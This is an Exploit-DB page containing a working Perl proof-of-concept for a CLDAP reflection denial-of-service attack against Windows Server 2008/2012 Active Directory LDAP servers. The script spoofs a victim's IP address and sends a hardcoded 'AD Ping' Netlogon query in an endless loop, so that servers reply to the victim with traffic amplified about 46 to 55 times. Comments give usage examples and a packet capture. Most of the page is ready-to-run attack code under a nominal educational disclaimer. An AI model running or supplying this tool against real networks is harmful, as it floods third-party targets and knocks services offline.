Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service

EDB-ID:

40703

CVE:

N/A

EDB Verified:

Author:

Todor Donev

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2016-11-08

Vulnerable App: 
#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon 
#  (CLDAP "AD Ping") query reflection DoS PoC
#
#  Copyright 2016 (c) Todor Donev
#  Varna, Bulgaria
#  todor.donev@gmail.com
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
#  MS Windows Server 2016       [NOT TESTED !!!]
# 
#  Description:
#  The attacker  sends a simple query to a vulnerable reflector 
#  supporting the Connectionless LDAP service (CLDAP) and using 
#  address spoofing makes it appear to originate from the intended 
#  victim. The CLDAP service responds to the spoofed address, 
#  sending unwanted network traffic to the attacker’s intended target.
# 
#  Amplification techniques allow bad actors to intensify the size 
#  of their attacks, because the responses generated by the LDAP 
#  servers are much larger than the attacker’s queries. In this case, 
#  the LDAP service responses are capable of reaching very high 
#  bandwidth and we have seen an average amplification factor of 
#  46x and a peak of 55x.
#
#
#  Disclaimer:
#  This or previous program is for Educational purpose ONLY. Do not 
#  use it without permission. The usual disclaimer applies, especially 
#  the fact that Todor Donev is not liable for any damages caused by 
#  direct or indirect use of the information or functionality provided 
#  by these programs. The author or any Internet provider bears NO 
#  responsibility for content or misuse of these programs or any 
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.) 
#  caused by the use of these programs is not Todor Donev's 
#  responsibility.
#
#  Use at your own risk and educational
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
#  # perl cldapdrdos.pl 192.168.1.112 192.168.1.146
#  [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
#  [ ======
#  [ Usg: cldapdrdos.pl <ldap server> <target> <port>
#  [ Default port: 389
#  [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
#  [ ======
#  [ <todor.donev@gmail.com> Todor Donev
#  [ Facebook: https://www.facebook.com/ethicalhackerorg
#  [ Website: https://www.ethical-hacker.org/
#  [ Sending CLDAP "AD Ping" packets..
#  ^C
#  # tcpdump -i eth0 -c4 port 389
#  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
#  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
#  00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  4 packets captured
#  6 packets received by filter
#  0 packets dropped by kernel
#
#
#
  
use Net::RawIP;

print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $cldap       = $ARGV[0];
my $target      = $ARGV[1];
my $port        = $ARGV[2] || '389';

die "[ Error: Port must be between 1 and 65535!\n"       if ($port < 1 || $port > 65535);

my $query  = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query    .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query    .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query    .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query    .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query    .= "\x65\x74\x6c\x6f\x67\x6f\x6e";
 
my $sock =  new Net::RawIP({ udp => {} }) or die;
print "[ Sending CLDAP \"AD Ping\" packets..\n";
while () {
                select(undef, undef, undef, 0.40);         # Sleep 400 milliseconds
                $sock->set({  ip =>  { saddr  => $target, daddr => $cldap},
                             udp =>  { source => 31337,   dest  => $port, data => $query} });
                $sock->send;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services